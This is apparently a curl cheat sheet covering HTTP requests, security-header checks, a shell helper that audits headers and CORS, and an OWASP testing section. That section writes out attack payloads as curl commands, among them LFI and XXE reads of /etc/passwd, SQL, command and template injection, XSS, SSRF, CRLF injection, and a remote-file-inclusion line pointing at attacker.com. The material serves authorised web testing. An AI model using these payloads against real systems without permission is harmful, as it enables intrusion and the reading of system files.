curl is a command-line tool for transferring data to and from URLs. For web work it is the standard way to make HTTP requests by hand: testing APIs, downloading files, and inspecting exactly what a server sends back. Below is a cheat sheet to help you use curl effectively.
**Curl Command Cheat Sheet:**
```bash
# Simple GET request
curl <URL>

# Save output to a file (-o names the file yourself; -O keeps the remote file name)
curl -o <filename> <URL>
curl -O <URL>

# Follow redirects
curl -L <URL>

# Custom HTTP method
curl -X <METHOD> <URL>

# Include a header (repeat -H for multiple headers)
curl -H "Header-Name: Header-Value" <URL>
curl -H "Header1: Value1" -H "Header2: Value2" <URL>

# POST form data (-d already implies POST and Content-Type: application/x-www-form-urlencoded)
curl -d "key1=value1&key2=value2" <URL>

# Send JSON data
curl -H "Content-Type: application/json" -d '{"key": "value"}' <URL>

# Send data from a file (-d strips newlines; --data-binary sends the file byte for byte)
curl -d @<filename> <URL>
curl --data-binary @<filename> <URL>

# Basic authentication (omit the password to be prompted; a password on the command line
# ends up in shell history and in `ps` output)
curl -u username:password <URL>
curl -u username <URL>

# Set the User-Agent (same as -H "User-Agent: ...")
curl -A "User-Agent-String" <URL>

# Show request and response headers, plus TLS handshake details
curl -v <URL>

# Show only response headers (sends a HEAD request)
curl -I <URL>

# Abort the whole transfer after N seconds; --connect-timeout limits only the connection phase
curl --max-time <seconds> <URL>
curl --connect-timeout <seconds> <URL>

# Skip TLS certificate validation. This removes the check that stops a man-in-the-middle,
# so use it only against lab hosts; for a self-signed test server prefer trusting its CA
curl -k <URL>
curl --cacert <ca.pem> <URL>

# Download multiple files (sequentially by default; -Z/--parallel fetches them concurrently, curl 7.66+)
curl -O <URL1> -O <URL2>
curl -Z -O <URL1> -O <URL2>

# Show a simple progress bar
curl -# -O <URL>

# Upload a file with PUT (-T already implies PUT, so -X PUT is redundant)
curl -T <file> <URL>
```
HTTP methods (GET, POST, PUT, DELETE, PATCH, HEAD, OPTIONS)
```bash
# GET request (the default, so -X GET is unnecessary)
curl https://api.example.com/data

# POST request (-d implies POST)
curl -X POST -d "param1=value1&param2=value2" https://api.example.com/data

# PUT request
curl -X PUT -d "param1=value1&param2=value2" https://api.example.com/data

# DELETE request
curl -X DELETE https://api.example.com/data

# PATCH request
curl -X PATCH -d "param1=new_value1" https://api.example.com/data

# HEAD request: use -I, not -X HEAD. -X only changes the method string, so curl still
# waits for a body that never arrives and hangs until the server closes the connection
curl -I https://api.example.com/data

# OPTIONS request (-i shows the Allow / Access-Control-Allow-Methods response headers)
curl -i -X OPTIONS https://api.example.com/data
```
Checking HTTP security headers
```bash
# -I sends a HEAD request. Some servers set different headers (or none) on HEAD,
# so for an accurate check send a GET, discard the body and dump the headers:
curl -I https://example.com
curl -sS -o /dev/null -D - https://example.com

# Pull out just the security-relevant headers (-i because HTTP/1.1 servers may use mixed case)
curl -sS -o /dev/null -D - https://example.com | grep -iE '^(strict-transport-security|content-security-policy|x-content-type-options|x-frame-options|referrer-policy|permissions-policy|cross-origin-(resource|embedder|opener)-policy):'

# Headers to look for:
#   Strict-Transport-Security (HSTS)   - only sent over https://; check max-age and includeSubDomains
#   Content-Security-Policy (CSP)      - also look for Content-Security-Policy-Report-Only
#   X-Content-Type-Options             - should be "nosniff"
#   X-Frame-Options                    - DENY or SAMEORIGIN; superseded by CSP frame-ancestors
#   Referrer-Policy
#   Permissions-Policy                 - replaces the older Feature-Policy header
#   Cross-Origin-Resource-Policy (CORP)
#   Cross-Origin-Embedder-Policy (COEP)
#   Cross-Origin-Opener-Policy (COOP)
# Deprecated headers you may still see; their absence is not a finding:
#   X-XSS-Protection, Expect-CT, Public-Key-Pins (HPKP)
```
Curl Command Cheat Sheet for OWASP Top 10 testing
```bash
# GET request with cookies and a browser User-Agent
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" \
     -b "name=value; name2=value2" <URL>

# POST request with custom headers and form data
curl -H "Authorization: Bearer <TOKEN>" -d "username=user&password=pass" <URL>

# Send JSON and pretty-print the JSON response
curl -s -H "Content-Type: application/json" -d '{"key": "value"}' <URL> | jq .

# Follow redirects and show the response headers of every hop
curl -iL <URL>

# Basic authentication
curl -u username:password <URL>

# Local file inclusion (LFI). Traversal payloads need URL-encoding; -G --data-urlencode
# does that and puts the field in the query string
curl "<URL>/page.php?page=/etc/passwd"
curl -G --data-urlencode "page=../../../../etc/passwd" "<URL>/page.php"

# Remote file inclusion (RFI): point the parameter at a host you control and watch for the fetch
curl -G --data-urlencode "url=http://attacker.com/malicious-code.txt" "<URL>/page.php"

# Server-side request forgery (SSRF): compare the response against a known-external target
curl -G --data-urlencode "url=http://internal-server/" "http://vulnerable.com/api"

# SQL injection (GET): quotes and spaces must be encoded in the query string
curl -G --data-urlencode "id=1' OR '1'='1" <URL>

# SQL injection (POST)
curl --data-urlencode "username=admin' OR '1'='1" --data-urlencode "password=test" <URL>

# Cross-site scripting (XSS). -d with -X GET sends a body, not a query parameter; use -G.
# curl can only show whether the payload comes back unencoded; execution needs a browser
curl -G --data-urlencode "input=<script>alert('XSS');</script>" <URL>

# Server-side template injection (SSTI): a 49 in the response means the template was evaluated
curl -d "user={{7*7}}" <URL>

# Open redirect: -i shows the Location header without following it
curl -i "<URL>?redirect=http://evil.com"

# Command injection (basic test)
curl -G --data-urlencode "input=test; whoami" <URL>

# File upload (multipart/form-data); ;type= controls the declared MIME type
curl -F "file=@/path/to/local-file" <URL>
curl -F "file=@/path/to/local-file;type=image/png" <URL>

# IP-based controls that trust client-supplied headers: a WAF or app that honours
# X-Forwarded-For can be made to treat the request as coming from an allowlisted address
curl -H "X-Forwarded-For: 127.0.0.1" <URL>

# CORS misconfiguration: send an attacker origin and inspect
# Access-Control-Allow-Origin and Access-Control-Allow-Credentials in the response
curl -i -H "Origin: https://evil.com" <URL>
```
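The header checks in the previous section and the CORS test above only dump headers; reading the dump is left to the eye. The shell helpers below are an example added here, not part of the original cheat sheet and not curl functionality: `audit_security_headers` reads a `curl -D -` header dump and reports each expected header as OK, WEAK or MISSING (returning the number missing), and `classify_cors` says what the response's CORS headers let a given `Origin` do. The helper names, the header list, the weak-value rules (CSP allowing `unsafe-inline`/`unsafe-eval`, HSTS with `max-age=0`) and the two sample responses are this example's own constructions, not captured from any real server.

```shell
#!/bin/sh
# Added example: post-process a curl header dump (curl -sS -o /dev/null -D - URL).
# Helper names, header list, weak-value rules and sample responses are this
# example's own choices, not curl features or output from any real server.

# header_value NAME: print the first value of header NAME (case-insensitive name,
# CR stripped) from an HTTP header dump on stdin; prints nothing if absent.
header_value() {
  awk -v name="$(printf '%s' "$1" | tr 'A-Z' 'a-z')" '
    {
      line = $0
      sub(/\r$/, "", line)
      if (tolower(substr(line, 1, length(name) + 1)) == (name ":")) {
        v = substr(line, length(name) + 2)
        sub(/^[ \t]+/, "", v)
        sub(/[ \t]+$/, "", v)
        print v
        exit
      }
    }'
}

# Headers the audit expects on an HTML response (this example's own list).
REQUIRED_HEADERS='strict-transport-security content-security-policy
x-content-type-options x-frame-options referrer-policy permissions-policy
cross-origin-opener-policy cross-origin-resource-policy'

# audit_security_headers: read a header dump on stdin, print one line per
# required header (OK / WEAK / MISSING) and return the number of missing ones.
audit_security_headers() {
  dump=$(cat)
  missing=0
  for name in $REQUIRED_HEADERS; do
    value=$(printf '%s\n' "$dump" | header_value "$name")
    if [ -z "$value" ]; then
      printf 'MISSING %s\n' "$name"
      missing=$((missing + 1))
      continue
    fi
    case "$name:$value" in
      # a CSP that allows inline scripts or eval gives little XSS protection
      content-security-policy:*unsafe-inline*|content-security-policy:*unsafe-eval*) verdict=WEAK ;;
      # HSTS does nothing without a non-zero max-age
      strict-transport-security:*max-age=[1-9]*) verdict=OK ;;
      strict-transport-security:*) verdict=WEAK ;;
      *) verdict=OK ;;
    esac
    printf '%s %s: %s\n' "$verdict" "$name" "$value"
  done
  return "$missing"
}

# classify_cors ORIGIN: read the header dump of a response to a request that
# carried "Origin: ORIGIN" and say what the CORS policy lets that origin do.
classify_cors() {
  origin=$1
  dump=$(cat)
  acao=$(printf '%s\n' "$dump" | header_value access-control-allow-origin)
  acac=$(printf '%s\n' "$dump" | header_value access-control-allow-credentials | tr 'A-Z' 'a-z')
  if [ -z "$acao" ]; then
    echo no-cors                      # no ACAO header: browsers block cross-origin reads
  elif [ "$acao" = "$origin" ] && [ "$acac" = "true" ]; then
    echo reflected-with-credentials   # exploitable: attacker page reads authenticated responses
  elif [ "$acao" = "$origin" ]; then
    echo reflected                    # only unauthenticated content is exposed
  elif [ "$acao" = "*" ] && [ "$acac" = "true" ]; then
    echo wildcard-with-credentials    # invalid combination; browsers reject it
  elif [ "$acao" = "*" ]; then
    echo wildcard                     # public data only; credentials are never sent
  elif [ "$acao" = "null" ]; then
    echo null-allowed                 # sandboxed iframes and data: URLs send Origin: null
  else
    echo fixed-origin
  fi
}

# Constructed sample responses with CRLF line endings, as curl -D - would dump them.
SAMPLE_WEAK="HTTP/2 200\r
strict-transport-security: max-age=0\r
content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline'\r
x-content-type-options: nosniff\r
x-frame-options: DENY\r
access-control-allow-origin: https://evil.example\r
access-control-allow-credentials: true\r
\r
"
SAMPLE_HARDENED="HTTP/2 200\r
strict-transport-security: max-age=63072000; includeSubDomains; preload\r
content-security-policy: default-src 'self'; frame-ancestors 'none'\r
x-content-type-options: nosniff\r
x-frame-options: DENY\r
referrer-policy: no-referrer\r
permissions-policy: camera=(), microphone=()\r
cross-origin-opener-policy: same-origin\r
cross-origin-resource-policy: same-origin\r
\r
"

# Demo on the weak sample; for a live host replace the printf with
#   curl -sS -o /dev/null -D - -H "Origin: https://evil.example" https://example.com
printf '%b' "$SAMPLE_WEAK" | audit_security_headers || echo "$? required header(s) missing"
printf '%b' "$SAMPLE_WEAK" | classify_cors https://evil.example
```

Because the dump comes from a GET rather than `-I`, the verdict reflects what browsers actually receive. `reflected-with-credentials` is the combination worth reporting: the server echoed an arbitrary origin and allowed cookies, so a page on that origin can read the victim's authenticated responses. Everything else in the classification still needs a look at which resource was requested before it becomes a finding.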
Other useful curl options and tests
```bash
# Write the response to a file with no progress output (-sS still reports errors)
curl -sS -o <output-file> <URL>

# Response headers only
curl -I <URL>

# Only the HTTP response code
curl -s -o /dev/null -w "%{http_code}\n" <URL>

# Follow redirects but stop after N hops (-m/--max-time is a timeout, not a redirect limit)
curl -L --max-redirs <max-redirects> <URL>

# Use a specific network interface (or source address)
curl --interface <interface-name> <URL>

# Use a specific DNS server (needs a curl built with c-ares; `curl -V` lists "c-ares" in Features)
curl --dns-servers <dns-server-ip> <URL>

# Force a specific HTTP version
curl --http1.0 <URL>
curl --http1.1 <URL>
curl --http2 <URL>

# Send a file body verbatim (-d would strip newlines)
curl -X POST --data-binary "@<file-path>" <URL>

# Read request headers from a file, one "Name: value" per line
curl -H "@<header-file>" <URL>

# XML external entity (XXE) injection
curl -X POST -H "Content-Type: application/xml" --data-binary '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>' <URL>

# Blind SSRF via timing: -m only caps how long curl waits, so print the status and elapsed
# time and compare an internal target against one that is certainly unreachable
curl -s -o /dev/null -w "%{http_code} %{time_total}\n" -m 10 "http://vulnerable.com/api?url=http://internal-server/"

# HTTP method misconfiguration: try methods the app should reject and check the status
curl -i -X PUT -d "data=secret" <URL>
curl -i -X DELETE <URL>

# Specific User-Agent
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" <URL>

# Custom Host header (virtual-host discovery, or checking whether the app builds links from Host)
curl -H "Host: example.com" <URL>

# Route the request through a proxy (for example an intercepting proxy)
curl -x <proxy-url>:<port> <URL>

# Form with multiple fields
curl -d "username=user&password=pass&other_field=value" <URL>

# HTTP header (CRLF) injection. curl sends -H values verbatim, so %0d%0a inside a -H value is
# just literal text. Put the encoded CRLF in a parameter the server copies into a response
# header and use -i to see whether a new header line appears
curl -i "<URL>?name=value%0d%0aInjected-Header:%20injected"
```